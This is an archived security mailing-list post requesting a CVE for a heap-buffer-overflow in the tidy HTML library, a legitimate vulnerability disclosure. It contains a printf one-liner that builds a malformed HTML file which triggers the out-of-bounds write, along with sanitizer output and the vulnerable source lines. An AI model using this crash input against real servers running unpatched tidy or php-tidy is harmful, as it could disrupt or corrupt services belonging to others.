Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 4 Jun 2015 00:50:41 -0500
From: Fernando Muñoz <>
Subject: CVE Request - tidy 0.99 / tidy5 heap-buffer-overflow

Hello ,

I'd like to request a CVE ID for the following issue:

tidy [1]  is affected by a write out of bounds when processing
malformed html files.
This issue could be abused on server side applications that use
php-tidy extension with user input.

The issue was confirmed, analysed and fixed by the tidy5 maintainer. [2]


$ printf "\x3c\x61\x20\x62\x3d\x3c\x61\x20\x3c\x3f\x78\x6d
\x66\x3d\x22\x12\x22\xbb" > err.html

An asan-enabled build of tidy outputs:

$ tidy-asan err.html
==2196==ERROR: AddressSanitizer: heap-buffer-overflow on address
0xb53006b1 at pc 0xb71df8fe bp 0xbfac9928 sp 0xbfac9918
WRITE of size 1 at 0xb53006b1 thread T0
    #0 0xb71df8fd in prvTidytmbstrndup (/usr/lib/
    #1 0xb7141060 in prvTidyGetToken (/usr/lib/
    #2 0xb711856e in prvTidyParseDocument (/usr/lib/
    #3 0xb71f2a58 in prvTidyDocParseStream (/usr/lib/
    #4 0xb71f34a5 in tidyParseFile (/usr/lib/
    #5 0x804bfa9 (/usr/bin/tidy+0x804bfa9)
    #6 0xb6edf72d in __libc_start_main (/lib/i386-linux-gnu/
    #7 0x804fa4e (/usr/bin/tidy+0x804fa4e)

0xb53006b1 is located 0 bytes to the right of 1-byte region
allocated by thread T0 here:
    #0 0xb72af18c in __interceptor_malloc
    #1 0xb71c5963 (/usr/lib/

Valgrind with the standard build:

$ valgrind tidy err.html
==30499== Invalid write of size 1
==30499==    at 0x408805C: prvTidytmbstrndup (tmbstr.c:39)
==30499==    by 0x40738A8: ParseValue (lexer.c:3486)

==30499== Invalid write of size 1
==30499==    at 0x4088065: prvTidytmbstrndup (tmbstr.c:41)
==30499==    by 0x40738A8: ParseValue (lexer.c:3486)
==30499==    by 0x4075F39: ParseAttrs (lexer.c:3603)
==30499==    by 0x4075F39: GetTokenFromStream (lexer.c:2416)

file: tmbstr.c

39        while ( len-- > 0 &&  (*cp++ = *str++) )
40          /**/;
41        *cp = 0;

Credit: Fernando Muñoz


Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ